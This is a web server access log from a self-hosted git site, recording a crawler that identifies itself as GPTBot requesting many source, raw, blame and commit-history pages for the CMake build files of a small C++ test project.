"/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14296] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11097] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11021] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15259] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16050] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10073] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12008] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9949] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10174] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39741] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:15:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16402] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9970] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11516] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10019] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20384] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14303] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16922] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16189] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" -[17/Feb/2026:15:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16922] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10777] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" -[17/Feb/2026:15:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10777] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" -[17/Feb/2026:15:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21647] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10463] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10461] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10461] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 